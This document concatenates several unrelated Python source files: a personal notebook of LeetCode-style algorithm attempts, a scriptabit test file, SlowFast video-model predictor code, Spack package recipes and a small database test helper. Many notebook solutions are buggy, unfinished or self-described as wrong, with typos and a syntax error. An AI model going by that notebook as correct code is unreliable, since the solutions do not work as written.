l2 = l2.next
carry = sum / 10
sum = sum % 10
current.next = Node(sum)
currnet = current.next
return dummy.next
# dummy version
def add_two_num(l1, l2):
carry = 0
dummy = Node(0)
current = dummy
while True:
if l1 is not None and l2 is not None:
digit = (l1.data + l2.data + carry) % 10
carry = (l1.data + l2.data + carry) / 10
l1 = l1.next
l2 = l2.next
elif l1 is None:
digit = (l2.data+carry) % 10
carry = (l2.data+carry) / 10
l2 = l2.next
elif l2 is None:
digit = (l1.data+carry) % 10
carry = (l1.data+carry) / 10
l1 = l1.next
elif carry != 0:
digit = carry
carry = 0
else:
break
current.next = Node(digit)
current = current.next
return dummy.next
# 101. Longest Substring Without Repeating Characters
def lengthOfLongestSubstring(self, s):
start = 0
max_len = 0
d = {}
for i, char in enumerate(s):
if char in d:
start = max(start,d[char] + 1)
d[char] = i
max_len = max(max_len, i-start+1)
return max_len
"""
This is totally wrong, aslo will pass the time
def longest_substring(str):
d = {}
max_len = 0
current = 0
for i, c in enumerate(str):
if c not in d:
d[c] = True
current += 1
max_len = max(current, max_len)
else:
d = { c : True }
current = 1
return max_len
"""
# 102. Recover Binary Search Tree
# Way to think it
def recover_best(root):
Node1 = None
Node2 = None
prev = None
recover_bst_helper(root, Node1, Node2, prev)
swap(Node1, Node2)
return root
def recover_bst_helper(root, Node1, Node2, prev):
if root is None:
return
recover_bst(root.left, Node1, Node2, prev)
if prev is not None and current.data < prev.data:
if Node1 is None:
Node1 = prev
else:
Node2 = current
prev = current
recover_bst_helper(root.right, Node1, Node2, prev)
# 103. Copy List with Random Pointer
# Not correct
def copy_list(head):
if head is None:
return None
cur = head
while cur is not None:
newNode = RandomListNode(cur.label)
newNode.next = cur.next
cur.next = newNode
cur = newNode.next
cur = head
while cur is not None:
newNode = cur.next
if cur.random is not None: # random pointer may not exist
newNode.random = cur.random.next
cur = newNode.next
cur = head
newNodehead = head.next
while cur is not None:
newNode = cur.next
cur.next = newNode.next
if newNode.next is not None:
newNode.next = newNode.next.next
cur = cur.next
return newNodehead
# 104. Best Time to Buy and Sell Stock III
# see 33
# 105. Valid Palindrome
# Too dan teng
def valid_palin(str):
start = 0
end = len(str) - 1
while start < end:
while start < end and not str[start].isalnum():
start += 1
while start < end and not str[end].isalnum():
end -= 1
if str[start] != str[end]:
return False
start += 1
end -= 1
return True
# 106. First Missing Positive
# Not done yet
def first_missing_poisitve(num_list):
start = 0
end = len(num_list) - 1
while start < end:
if num_list!=
# 107. Rotate List
def rotate_list(head, k):
dummy = Node(0)
fast = head
for i in range(k):
fast = fast.next
slow = head
while fast.next is not None:
fast = fast.next
slow = slow.next
fast.next = dummy.next
dummy.next = slow.next
slow.next = None
return dummy.next
# 108. Scramble String
def scramble_str(s1, s2):
if len(s1) != len(s2):
return False
return sramble(s1, s2)
def scramble(s1, s2):
if not has_same_letter(s1, s2):
return False
if len(s1) == 0 or len(s1) == 1:
return True
for i in range(len(s1)+1):
if scramble(s1[:i], s2[:i]) and scramble(s1[i:], s2[i:]) or scramble(s1[:i], s2[i:]) and scramble(s1[i:], s2[:i]):
return True
return False
def has_same_letter(s1, s2):
d = {}
for char in s1:
if char in d:
d[char] += 1
else:
d[char] = 1
for char in s2:
if char not in d:
return False
if d[char] == 1:
d.pop(char,None)
if len(d) > 0 :
return Fasle
else:
return True
# 109. 4Sum
def four_sum(s, target):
ret = []
if len(s) < 4:
return
four_sum_helper(s, target, [], ret)
return ret
def four_sum_helper(s, target, res, ret):
if target == 0 and len(res) == 4:
ret.append(res[:])
return
elif len(res) == 4 or len(s) < 4-len(res):
return
for i, num in enumerate(s):
res.append(num)
four_sum_helper(s[i+1:], target-num, res, ret)
res.pop()
# 110. Sqrt(x)
def sqrt(x):
import sys
start = 0
end = int(sys.maxint ** 0.5) + 1 # Remember here need to force **0.5 as a integer. Also +1
while start <= end: # maybe for fully test
mid = (start+end) / 2
sqr = mid*mid
if sqr == x:
return mid
elif sqr < x:
start = mid+1
else:
end = mid -1
return (start+end) / 2
# 111. Permutation Sequence
# Way to think:
# 1 2 3 Group them by first digit 1, 2, 3,
# 1 3 2 Will see that (n-1)! is the permutation times of n-1 digits.
# 2 1 3 k / (n-1)! is the bucket that n digit in, which is the sequence of available nums[].
# 2 3 1 Or that is to say, it is the (n-1)! permuation times we loop through the nums
# 3 1 2 So every time we get a num from nums, we need to pop it.
# 3 2 1 nums[] has two important attributes:
# 1. means the available nums we have. 2. Sequence, the order of the nums.
# So we can change the nums to whatever we want, or even use reverse order.
def perm_seq(n, k):
num = []
res = ''
total = 1
for i in range(1, n+1): # n+1
num.append(str(i))
total *= i
k -= 1 # This is important
while n > 0:
total /= n
i = k / total
k %= total
res += num[i]
num.pop(i)
n -= 1
return res # return ''.join(res) ?? why not just return res
# Used for testing
# print 'Start: n = ', n,', i = ', i, ', k = ', k,', total = ', total, ', res = ', res, ', num = ', num
# print 'n = ', n,', i = ', i, ', k = ', k,', total = ', total, ', res = ', res, ', num = ', num
# 112. Clone Graph
# Don't know why didn't pass
def cloneGraph(self, node):
if node is None:
return None
# Use oldNode as the oldGraph, newNode as the newGraph. Use tuple (oldNode, newNode) to store relation
newNodeHead = UndirectedGraphNode(node.label)
queue = collections.deque()
queue.append((node,newNodeHead))
map_dict = {}
while len(queue) > 0:
(oldNode,newNode) = queue.popleft()
if oldNode in map_dict:
continue
map_dict[oldNode] = 'Visited'
newNode.neighbors = []
for oldNeighbor in oldNode.neighbors:
newNeighbor = UndirectedGraphNode(oldNeighbor.label)
queue.append((oldNeighbor, newNeighbor))
newNode.neighbors.append(newNeighbor)
return newNodeHead
# 113. Maximal Rectangle
def max_rec():
pass
# 114. Implement strStr()
# This is the final KMP way
def strStr(haystack, needle):
H = len(haystack)
N = len(needle)
if N == 0:
return haystack
i = 0
while i < H-N+1:
if haystack[i] == needle[0]:
start = None # Use None here
j = 1
while j < N:
if haystack[i+j] != needle[j]:
break
elif start is None and haystack[i+j] == needle[0]: # Find first dup occurance
start = i+j
j += 1
if j == N:
return haystack[i:]
if start is not None:
i = start - 1 # Detail, need to check start - 1
i+=1
return None
"""
Definetly wrong
def strstr(haystack, needle):
N = len(haystack)
H = len(needle)
while True:
startStack = 0
startNeedle = 0
while haystack[startStack] == needle[startNeedle] and startNeedle < H:
startStack += 1
startNeedle += 1
if startNeedle == H:
return haystack
if startStack == N:
return None
return None
# KMP way
def strStr(haystack, needle):
if len(needle) == 0:
return None
start = 0
H = len(haystack)
N = len(needle)
while True:
if H - start < N:
return None
if haystack[start] == needle[0]:
tmp_start = None
i = 1
while i < N and heystack[start+i] == needle[i]:
if tmp_start is None and heystack[start+i] == needle[0]:
temp_start = start + i
i += 1
if i == N -1:
return haystack
if tmp_start is not None:
start = tmp_start - 1
start += 1
"""
# 115. Longest Palindromic Substring
# Check each point, has aba and abba two possibilities.
# O(N2) time and O(1) space
def longest_palin_str(s):
if len(s) == 0:
return 0
if len(s) == 1:
return 1
N = len(s)
longest = 1
for i in range(N-1):
string1 = expand_palin(s, i, i)
longest = max(longest, len(string1))
string2 = expand_palin(s, i, i+1)
longest = max(longest, len(string2))
return longest
def expand_palin(s, l, r):
while l >= 0 and r <= len(s)-1 and s[l] == s[r]:
l -= 1
r += 1
return s[l+1:r]
# 116. Sudoku Solver
def sudoku_solver(board):
solver(board, 0, 0)
def solver(board, row, col):
(crow, ccol) = getNextEmpty(board, row, col)
if (crow) == 9:
return True
available_num = getAvailable(board, crow, ccol)
for num in available_num:
board[crow][ccol] = num
if solver(board, crow, ccol):
return True
board[crow][ccol] = '.'
return False
def getNextEmpty(board, row, col):
while row < 9 and board[row][col] != '.':
if col+1 == 9:
row = row + 1
col = (col+1) % 9 # No need to check the last one in the row
return (row, col)
def getAvailable(board, row, col):
occupied = []
for i in range(9):
if board[row][i] != '.':
occupied.append(board[row][i])
if board[i][col] != '.':
occupied.append(board[i][col])
box_row = (row/3)*3 + i/3 # This is a awesome algorithm to generate 3 by 3 from 9
box_col = (col/3)*3 + i%3 # But it's the same to generate from box_row + range(3)
if board[box_row][box_col] != '.':
available.append(board[box_row][box_col])
return available
# 117. Largest Rectangle in Histogram
# O(n2) way to do this
def lar_rec_histo(histo):
N = len(histo)
maxV = 0
for i in range(N):
if i < N-1 and histo[i] < histo[i+1]:
continue
min_height = histo[i]
for j in range(i-1,-1,-1):
min_height = min(histo[j], min_height)
maxV = max( min_height * (i-j+1), maxV)
return maxV
def lar_rec_histo(histo):
pass
# KAN BU DONG
# 118. Spiral Matrix
# Need to check the diff in the future
def spiral_matrix(matrix):
imin = 0
imax = len(matrix) - 1
jmin = 0
jmax = len(matrix[0]) - 1
res = []
while True:
for j in range(jmin, jmax+1):
res.append(matrix[imin][j])
imin += 1
if imin >= imax:
break
for i in range(imin, imax+1):
res.append(matrix[i][jmax])
jmax -= 1
if jmin >= jmax:
break
for j in range(jmax, jmin-1, -1):
res.append(matrix[imax][j])
imax -= 1
if imin >= imax:
break
for i in range(imax, imin-1):
res.append(matrix[i][jmin])
jmin += 1
if jmin >= jmax:
break
return res
# 119. Insert Interval
# No need to do the same thing as website. This is pretty good. Just remember to check the last element
def insert_interval(int_list, insert):
min_num = insert[0]
max_num = insert[1]
res = []
N = len(int_list)
appended = False
for int_pair in int_list[:]:
if int_pair[1] < min_num:
res.append(int_pair)
if int_pair[0] > max_num:
if not appended:
res.append([min_num,max_num])
appended = True
res.append(int_pair)
if int_pair[0] <= min_num and int_pair[1] >= min_num:
min_num = int_pair[0]
int_list.remove(int_pair)
if int_pair[0] <= max_num and int_pair[1] >= max_num:
max_num = int_pair[1]
int_list.remove(int_pair)
if not appended:
res.append([min_num,max_num])
return res
# 120. Merge Interval
# Tai ji ba jian dan le
def merge_interval(intervals):
N = len(intervals)
res = []
prev_end = intervals[0][1]
prev = intervals[0]
for inter in intervals[1:]:
if inter[0] > prev[1]:
res.append(prev[:])
prev = inter
else:
prev = [min(prev[0],inter[0]), max(prev[1],inter[1])]
res.append(prev[:])
return res
# 121. Word Break
# Return True but not list
# This is O(n2) way, use dp can be less
def word_break(rest_word, diction):
N = len(rest_word)
if N == 0:
return True
for i in range(1,N+1):
if rest_word[:i] in diction:
return word_break_helper(res, rest_word[i:], diction)
return False
# 122. Restore IP Addresses
def restore_ip(ip):
ret = []
restore_ip_helper(ret, [], ip)
return ret
def restore_ip_helper(ret, res, rest_ip):
if len(res) == 4 and len(rest_ip) == 0:
ret.append(res[:])
return
if len(res) == 4:
return
# Ne need to check this? But this will truely save a lot
#N = len(res)
#if len(rest_ip) / 3 > 4-N:
# return
for i in range(len(rest_ip)): # This is so important, see this error
num = int(rest_ip[:i+1]) # num = 3 rest_ip = 35 res = [255, 255, 111, 3] i = 0
if num == 0 or num > 255: # num = 35 rest_ip = 35 res = [255, 255, 111, 35] i = 1
break # num = 35 rest_ip = 35 res = [255, 255, 111, 35] i = 2
res.append(num)
restore_ip_helper(ret, res, rest_ip[i+1:])
res.pop()
# Used for debug print 'num = ', num, 'rest_ip = ', rest_ip, 'res = ', res, 'i = ', i
# 123. Multiply Strings
def mult_str():
pass
# 124. Sort List
# Need to take a deeper look into the merge sort
def sort_list(head):
return sort_linked_list(head, getLength):
def sort_linked_list(head, N):
if N == 0:
return None
if N == 1:
current = head
head = head.next
current.next = None
return current
half = N/2
head1 = sort_linked_list(head, half)
head2 = sort_linked_list(head, N-half)
return merge_list(head1, head2)
def merge_list(head1, head2):
dummy = Node(0)
current = dummy
while head1 is not None and head2 is not None:
if head1.data < head2.data:
current.next = head1
head1 = head1.next
else:
current.next = head2
head2 = head2.next
current = current.next
if head1 is not None:
current.next = head1
if head2 is not None:
current.next = head2
return dummy.next
def getLength(head):
length = 0
while head is not None:
head = head.next
length += 1
return length
# 125. Binary Tree Maximum Path Sum
def bt_max_path_sum(root):
if root is None:
return 0
res = 0
bt_max_path_helper(root, res)
return res
def bt_max_path_helper(root, res):
if root is None:
return 0
left = bt_max_path_helper(root.left, res)
right = bt_max_path_helper(root.right, res)
cur = root.data
sum = max(max(left, right) + root.data, root.data)
res = max(res, sum)
res = max(res, root.data+left+right) # The case that node from left to right is the largest
return sum # This point's max
# 126. Reorder List
def reorder_list():
if head is None or head.next is None:
return
slow = head
fast = head.next.next # Let fast go one more round first then we don't need mid
while fast is not None and fast.next is not None:
slow = slow.next
fast = fast.next.next
if fast is not None:
slow = slow.next
mid = slow
cur = mid.next
while cur.next is not None:
move = cur.next
cur.next = move.next
move.next = mid.next
mid.next = move
left = head # Start to merge two lists
while left != mid: # Ends when left = mid
right = mid.next
mid.next = right.next
right.next = left.next
left.next = right
left = right.next
# Way to think:
# If we loop the list all the time, it will exceed the time limit
# So just find the second half, reverse the second half, and merge it with the first half, that's done
"""This way should work, but will exceed the time limit
def reorderList(self, head):
while head is not None:
tail = head
prev = tail
while tail.next is not None:
prev = tail
tail = tail.next
if prev == tail:
return
prev.next = None
tail.next = head.next
head.next = tail
head = tail.next
"""
# 127. Regular Expression Matching
def regex_matching():
pass
# 128. Word Search
def word_search():
pass
# 129. Simplify Path
def simplify_path():
pass
# 130. Evaluate Reverse Polish Notation
def evalu_reverse_pon():
pass
# 131. Longest Valid Parentheses
def longest_valid_parentheses():
pass
# 132. Two Sum
def two_sum():
pass
# 133. Interleaving String
def interleaving_string():
pass
# 134. Substring With Concatenation of All Words
def sub_with_con_all_words():
pass
# 135. Candy
def candy():
pass
# 136. PalinDrome Partitioning II
def palin_partition_ii():
pass
# 137. Minimum Window Substring
def min_window_sub():
pass
# 138. Word Ladder
def word_ladder():
pass
# 139. Median of Two Sorted Arrays
def med_of_two_arrarys():
pass
# 140. 3 Sum
def three_sum():
pass
# 141. Decode Ways
def decode_ways():
pass
# 142. Divide Two Integers
def divide_two_integers():
pass
# 143. Word Break II
def word_break_ii():
pass
# 144. String to Integer (atoi):
def atoi():
pass
# 145. Surrounded Regions
def surrounded_regions():
pass
# 146. Text Justification
def text_justi():
pass
# 147. Reverse Words in a String
# Using python is too simple
def reverse_words_in_str(str):
return ' '.join(str.split()[::-1])
def reverse_words_in_str(str):
res = ''
word = ''
for char in str:
if char != ' ':
word += char
elif len(word) > 0:
if res != '':
res = ' ' + res
res = word + res
word = ''
if len(word) > 0:
if res != '':
res = ' ' + res
res = word + res
return res
# 148. LRU Cache
def lru_cache():
pass
# 149. Wildcard Matching
def wildcard_matching():
pass
# 150. Valid Number
def valid_number():
pass
# 151. Max Points on a Line
def max_points_line():
pass
# 152. Word Ladder II
def word_ladder_ii():
pass
if __name__ == '__main__':
#num_list = [1,2,3,4,5,6,7,8,9,10,2,3,4,5,6,7,8,9,10]
#print single_number(num_list)
#print reverse_int(131)
#print unique_bst(4)
#num_list = [1,3,5,7,9,10]
#target = 3
#print search_insert_position_1(num_list, target)
#print search_insert_position(num_list, target, 0, len(num_list)-1)
#print roman_2_integer('MCMLIVx')
#print pascal_triangle(5)
"""
This is way fucking too easy. Why people want to use swap the real nodes?
head = Node(1)
head.next = Node(2)
head.next.next = Node(5)
head.next.next.next = Node(3)
head.next.next.next.next = Node(10)
print_list(head)
swap_nodes(head)
print 'shit'
print_list(head)
"""
# Note for todo:
"""
1. check the best way to implement reverse_int. This is not a clever one
Not Understand yet:
16. Single Number II
19. Merge Sorted List
27. GrayCode
Not Done yet:
103 Copy List with Random Pointer
113 and 117 Both Rec Graph
123 Multiply Strings
"""
| 26.640831 | 122 | 0.537223 |
795460823556b9e43ad6d9c18d3cacbc2ce2910c | 2,578 | py | Python | scriptabit/tests/test_habitica_task.py | luqiang21/scriptabit | 0d0cf71814e98954850891fa0887bdcffcf7147d | [
"Apache-2.0"
] | 9 | 2016-09-04T07:02:20.000Z | 2021-06-29T07:29:40.000Z | scriptabit/tests/test_habitica_task.py | luqiang21/scriptabit | 0d0cf71814e98954850891fa0887bdcffcf7147d | [
"Apache-2.0"
] | 35 | 2016-07-30T01:03:15.000Z | 2022-02-12T20:27:37.000Z | scriptabit/tests/test_habitica_task.py | luqiang21/scriptabit | 0d0cf71814e98954850891fa0887bdcffcf7147d | [
"Apache-2.0"
] | 8 | 2016-09-05T12:36:53.000Z | 2020-06-15T18:25:50.000Z | # -*- coding: utf-8 -*-
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
from builtins import *
import json
import pytest
import requests
import requests_mock
from pkg_resources import resource_filename
from scriptabit import (
HabiticaTask,
Difficulty,
CharacterAttribute,
SyncStatus)
from .fake_data import get_fake_task
def test_id():
d = get_fake_task(_id='432')[0]
task = HabiticaTask(d)
assert d['_id'] == '432'
assert task.id == '432'
def test_create_default():
task = HabiticaTask()
assert task
assert task.name == 'scriptabit todo'
assert task.difficulty == Difficulty.default
assert task.attribute == CharacterAttribute.default
def test_invalid_difficulty():
task = HabiticaTask(get_fake_task()[0])
with pytest.raises(TypeError):
task.difficulty = 'really hard'
def test_existing_difficulty():
task = get_fake_task()[0]
expected = Difficulty.hard
task['priority'] = expected.value
ht = HabiticaTask(task)
assert ht.difficulty == expected
def test_invalid_attribute():
task = HabiticaTask(get_fake_task()[0])
with pytest.raises(TypeError):
task.attribute = 'dex'
def test_valid_difficulty():
task = HabiticaTask(get_fake_task()[0])
task.difficulty = Difficulty.trivial
assert task.difficulty == Difficulty.trivial
def test_valid_attribute():
task = HabiticaTask(get_fake_task()[0])
task.attribute = CharacterAttribute.intelligence
assert task.attribute == CharacterAttribute.intelligence
def test_existing_attribute():
task = get_fake_task()[0]
expected = CharacterAttribute.constitution
task['attribute'] = expected.value
ht = HabiticaTask(task)
assert ht.attribute == expected
def test_id_readonly():
task = HabiticaTask(get_fake_task()[0])
with pytest.raises(AttributeError):
task.id = 'aeai239'
def test_init():
_id = '111'
name = 'a task'
description = 'something'
completed = True
difficulty = Difficulty.hard
attribute = CharacterAttribute.intelligence
status = SyncStatus.updated
d = get_fake_task(_id=_id, text=name, notes=description, completed=completed)[0]
a = HabiticaTask(d)
a.difficulty = difficulty
a.status = status
a.attribute = attribute
assert a.id == _id
assert a.name == name
assert a.description == description
assert a.completed == completed
assert a.difficulty == difficulty
assert a.attribute == attribute
assert a.status == status
| 26.040404 | 84 | 0.700543 |
7954612c88950b2acfc08cb70c7ff7a825db9c09 | 6,412 | py | Python | slowfast/visualization/predictor.py | Romero027/SlowFast | f4308eb1c46d88c3a41a6fb2d1fd4fad56fdd43a | [
"Apache-2.0"
] | null | null | null | slowfast/visualization/predictor.py | Romero027/SlowFast | f4308eb1c46d88c3a41a6fb2d1fd4fad56fdd43a | [
"Apache-2.0"
] | null | null | null | slowfast/visualization/predictor.py | Romero027/SlowFast | f4308eb1c46d88c3a41a6fb2d1fd4fad56fdd43a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import cv2
import torch
from detectron2 import model_zoo
from detectron2.config import get_cfg
from detectron2.engine import DefaultPredictor
import slowfast.utils.checkpoint as cu
from slowfast.datasets import cv2_transform
from slowfast.models import build_model
from slowfast.utils import logging, misc
from slowfast.visualization.utils import process_cv2_inputs
logger = logging.get_logger(__name__)
class ActionPredictor:
"""
Action Predictor for action recognition.
"""
def __init__(self, cfg):
"""
Args:
cfg (CfgNode): configs. Details can be found in
slowfast/config/defaults.py
"""
# Build the video model and print model statistics.
self.model = build_model(cfg)
self.model.eval()
self.cfg = cfg
logger.info("Start loading model info")
misc.log_model_info(self.model, cfg, use_train_input=False)
logger.info("Start loading model weights")
cu.load_test_checkpoint(cfg, self.model)
logger.info("Finish loading model weights")
def __call__(self, task):
"""
Returns the prediction results for the current task.
Args:
task (TaskInfo object): task object that contain
the necessary information for action prediction. (e.g. frames, boxes)
Returns:
task (TaskInfo object): the same task info object but filled with
prediction values (a tensor) and the corresponding boxes for
action detection task.
"""
frames, bboxes = task.frames, task.bboxes
if bboxes is not None:
bboxes = cv2_transform.scale_boxes(
self.cfg.DATA.TEST_CROP_SIZE,
bboxes,
task.img_height,
task.img_width,
)
if self.cfg.DEMO.INPUT_FORMAT == "BGR":
frames = [
cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) for frame in frames
]
frames = [
cv2_transform.scale(self.cfg.DATA.TEST_CROP_SIZE, frame)
for frame in frames
]
inputs = process_cv2_inputs(frames, self.cfg)
if bboxes is not None:
index_pad = torch.full(
size=(bboxes.shape[0], 1),
fill_value=float(0),
device=bboxes.device,
)
# Pad frame index for each box.
bboxes = torch.cat([index_pad, bboxes], axis=1)
if self.cfg.NUM_GPUS > 0:
# Transfer the data to the current GPU device.
if isinstance(inputs, (list,)):
for i in range(len(inputs)):
inputs[i] = inputs[i].cuda(non_blocking=True)
else:
inputs = inputs.cuda(non_blocking=True)
if self.cfg.DETECTION.ENABLE and not bboxes.shape[0]:
preds = torch.tensor([])
else:
preds = self.model(inputs, bboxes)
if self.cfg.NUM_GPUS:
preds = preds.cpu()
if bboxes is not None:
bboxes = bboxes.cpu()
preds = preds.detach()
task.add_action_preds(preds)
if bboxes is not None:
task.add_bboxes(bboxes[:, 1:])
return task
class Detectron2Predictor:
"""
Wrapper around Detectron2 to return the required predicted bounding boxes
as a ndarray.
"""
def __init__(self, cfg):
"""
Args:
cfg (CfgNode): configs. Details can be found in
slowfast/config/defaults.py
"""
self.cfg = get_cfg()
self.cfg.merge_from_file(
model_zoo.get_config_file(cfg.DEMO.DETECTRON2_CFG)
)
self.cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = cfg.DEMO.DETECTRON2_THRESH
self.cfg.MODEL.WEIGHTS = cfg.DEMO.DETECTRON2_WEIGHTS
self.cfg.INPUT.FORMAT = cfg.DEMO.INPUT_FORMAT
self.cfg.MODEL.DEVICE = "cuda:0" if cfg.NUM_GPUS > 0 else "cpu"
logger.info("Initialized Detectron2 Object Detection Model.")
self.predictor = DefaultPredictor(self.cfg)
def __call__(self, task):
"""
Return bounding boxes predictions as a tensor.
Args:
task (TaskInfo object): task object that contain
the necessary information for action prediction. (e.g. frames, boxes)
Returns:
task (TaskInfo object): the same task info object but filled with
prediction values (a tensor) and the corresponding boxes for
action detection task.
"""
middle_frame = task.frames[len(task.frames) // 2]
outputs = self.predictor(middle_frame)
# Get only human instances
mask = outputs["instances"].pred_classes == 0
pred_boxes = outputs["instances"].pred_boxes.tensor[mask]
task.add_bboxes(pred_boxes)
return task
def draw_predictions(task, video_vis):
"""
Draw prediction for the given task.
Args:
task (TaskInfo object): task object that contain
the necessary information for visualization. (e.g. frames, preds)
All attributes must lie on CPU devices.
video_vis (VideoVisualizer object): the video visualizer object.
Returns:
frames (list of ndarray): visualized frames in the clip.
"""
boxes = task.bboxes
frames = task.frames
preds = task.action_preds
if boxes is not None:
img_width = task.img_width
img_height = task.img_height
boxes = cv2_transform.revert_scaled_boxes(
task.crop_size, boxes, img_height, img_width
)
keyframe_idx = len(frames) // 2 - task.num_buffer_frames
draw_range = [
keyframe_idx - task.clip_vis_size,
keyframe_idx + task.clip_vis_size,
]
frames = frames[task.num_buffer_frames :]
if boxes is not None:
if len(boxes) != 0:
frames = video_vis.draw_clip_range(
frames,
preds,
boxes,
keyframe_idx=keyframe_idx,
draw_range=draw_range,
)
else:
frames = video_vis.draw_clip_range(
frames, preds, keyframe_idx=keyframe_idx, draw_range=draw_range
)
del task
return frames
| 33.051546 | 85 | 0.602308 |
79546139a51fc660c1a7b9f6a67b633a24bdf577 | 938 | py | Python | var/spack/repos/builtin/packages/meshtool/package.py | kotfic/spack | 181ac574bb14f1d31910c421a419cc3866f0bce9 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/meshtool/package.py | kotfic/spack | 181ac574bb14f1d31910c421a419cc3866f0bce9 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 8 | 2021-11-09T20:28:40.000Z | 2022-03-15T03:26:33.000Z | var/spack/repos/builtin/packages/meshtool/package.py | kotfic/spack | 181ac574bb14f1d31910c421a419cc3866f0bce9 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class Meshtool(MakefilePackage):
"""Meshtool - A mesh manipulation utility"""
homepage = "https://bitbucket.org/aneic/meshtool/"
git = "https://bitbucket.org/aneic/meshtool.git"
maintainers = ['MarieHouillon']
version('master', branch='master')
# Version to use with openCARP releases
version('oc9.0', commit='6c5cfbd067120901f15a04bf63beec409bda6dc9')
version('oc8.2', commit='6c5cfbd067120901f15a04bf63beec409bda6dc9')
version('oc8.1', commit="6c5cfbd067120901f15a04bf63beec409bda6dc9")
version('oc7.0', commit="6c5cfbd067120901f15a04bf63beec409bda6dc9")
def install(self, spec, prefix):
mkdirp(prefix.bin)
install('meshtool', prefix.bin)
| 34.740741 | 73 | 0.727079 |
7954620ffeeda58ad2f05c0ec16a386e57e50abc | 532 | py | Python | tests/util/db_connection.py | zcomputerwiz/shamrock-blockchain | 2e2d8a134f0147379812085543ac98f37ce28c2b | [
"Apache-2.0"
] | null | null | null | tests/util/db_connection.py | zcomputerwiz/shamrock-blockchain | 2e2d8a134f0147379812085543ac98f37ce28c2b | [
"Apache-2.0"
] | null | null | null | tests/util/db_connection.py | zcomputerwiz/shamrock-blockchain | 2e2d8a134f0147379812085543ac98f37ce28c2b | [
"Apache-2.0"
] | null | null | null | from pathlib import Path
from shamrock.util.db_wrapper import DBWrapper
import tempfile
import aiosqlite
class DBConnection:
async def __aenter__(self) -> DBWrapper:
self.db_path = Path(tempfile.NamedTemporaryFile().name)
if self.db_path.exists():
self.db_path.unlink()
self.connection = await aiosqlite.connect(self.db_path)
return DBWrapper(self.connection)
async def __aexit__(self, exc_t, exc_v, exc_tb):
await self.connection.close()
self.db_path.unlink()
| 29.555556 | 63 | 0.701128 |
7954626ad26aaad60a35b3f497e787dfdd30c578 | 684 | py | Python | OOP5.py | PRASAD-DANGARE/PYTHON | 36214f7dc3762d327e5a29e40752edeb098249c8 | [
"MIT"
] | 1 | 2021-06-07T07:55:28.000Z | 2021-06-07T07:55:28.000Z | OOP5.py | PRASAD-DANGARE/PYTHON | 36214f7dc3762d327e5a29e40752edeb098249c8 | [
"MIT"
] | null | null | null | OOP5.py | PRASAD-DANGARE/PYTHON | 36214f7dc3762d327e5a29e40752edeb098249c8 | [
"MIT"
] | null | null | null | '''
Description : Demonstration of Characteristics of Class
Function Date : 04 Mar 2021
Function Author : Prasad Dangare
'''
print("Demonstration of Characteristics of Class")
class Demo: # Class Defination
x = 50 # Class Variable
def __init__(self,no1,no2): # Class Costructor
self.i = no1 # Instance Variable / Characteristics
self.j = no2
obj1 = Demo(10,20) # Object Created For Characteristics
obj2 = Demo(11,21)
# i & j Are Instance Variable
print(obj1.i) # 10
print(obj1.j) # 20
print(obj2.i) # 11
print(obj2.j) # 21
print(Demo.x) # 50 No Need To Create Object We Can Directly Access It By Its Class Name | 23.586207 | 87 | 0.660819 |
795462742d21d693970272a4df23c195145ff422 | 2,452 | py | Python | var/spack/repos/builtin/packages/proj/package.py | msimberg/spack | 27a339eeb28007bf0844e4c331bdd7d9da13da2e | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/proj/package.py | msimberg/spack | 27a339eeb28007bf0844e4c331bdd7d9da13da2e | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/proj/package.py | msimberg/spack | 27a339eeb28007bf0844e4c331bdd7d9da13da2e | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Proj(AutotoolsPackage):
"""PROJ is a generic coordinate transformation software, that transforms
geospatial coordinates from one coordinate reference system (CRS) to
another. This includes cartographic projections as well as geodetic
transformations."""
homepage = "https://proj.org/"
url = "http://download.osgeo.org/proj/proj-6.1.0.tar.gz"
maintainers = ['adamjstewart']
# Version 6 removes projects.h, while version 7 removes proj_api.h.
# Many packages that depend on proj do not yet support the newer API.
# See https://github.com/OSGeo/PROJ/wiki/proj.h-adoption-status
version('6.1.0', sha256='676165c54319d2f03da4349cbd7344eb430b225fe867a90191d848dc64788008')
version('6.0.0', sha256='4510a2c1c8f9056374708a867c51b1192e8d6f9a5198dd320bf6a168e44a3657')
version('5.2.0', sha256='ef919499ffbc62a4aae2659a55e2b25ff09cccbbe230656ba71c6224056c7e60')
version('5.1.0', sha256='6b1379a53317d9b5b8c723c1dc7bf2e3a8eb22ceb46b8807a1ce48ef65685bb3')
version('5.0.1', sha256='a792f78897482ed2c4e2af4e8a1a02e294c64e32b591a635c5294cb9d49fdc8c')
version('4.9.2', sha256='60bf9ad1ed1c18158e652dfff97865ba6fb2b67f1511bc8dceae4b3c7e657796')
version('4.9.1', sha256='fca0388f3f8bc5a1a803d2f6ff30017532367992b30cf144f2d39be88f36c319')
version('4.8.0', sha256='2db2dbf0fece8d9880679154e0d6d1ce7c694dd8e08b4d091028093d87a9d1b5')
version('4.7.0', sha256='fc5440002a496532bfaf423c28bdfaf9e26cc96c84ccefcdefde911efbd98986')
version('4.6.1', sha256='76d174edd4fdb4c49c1c0ed8308a469216c01e7177a4510b1b303ef3c5f97b47')
# https://github.com/OSGeo/proj.4#distribution-files-and-format
# https://github.com/OSGeo/proj-datumgrid
resource(
name='proj-datumgrid',
url='https://download.osgeo.org/proj/proj-datumgrid-1.8.tar.gz',
